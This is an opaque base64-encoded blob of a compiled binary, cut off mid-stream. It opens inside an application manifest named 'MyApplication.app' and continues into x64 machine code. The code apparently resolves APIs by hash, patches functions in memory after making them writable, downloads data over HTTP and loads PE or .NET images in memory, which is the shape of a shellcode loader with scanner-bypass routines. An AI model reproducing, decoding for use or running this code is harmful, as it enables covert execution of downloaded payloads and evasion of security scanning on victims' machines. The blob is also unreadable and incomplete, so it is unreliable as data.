3NlbWJseUlkZW50aXR5IHZlcnNpb249IjEuMC4wLjAiIG5hbWU9Ik15QXBwbGljYXRpb24uYXBwIi8+DQogIDx0cnVzdEluZm8geG1sbnM9InVybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206YXNtLnYyIj4NCiAgICA8c2VjdXJpdHk+DQogICAgICA8cmVxdWVzdGVkUHJpdmlsZWdlcyB4bWxucz0idXJuOnNjaGVtYXMtbWljcm9zb2Z0LWNvbTphc20udjMiPg0KICAgICAgICA8cmVxdWVzdGVkRXhlY3V0aW9uTGV2ZWwgbGV2ZWw9ImFzSW52b2tlciIgdWlBY2Nlc3M9ImZhbHNlIi8+DQogICAgICA8L3JlcXVlc3RlZFByaXZpbGVnZXM+DQogICAgPC9zZWN1cml0eT4NCiAgPC90cnVzdEluZm8+DQo8L2Fzc2VtYmx5PgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAADAAAAEQ3AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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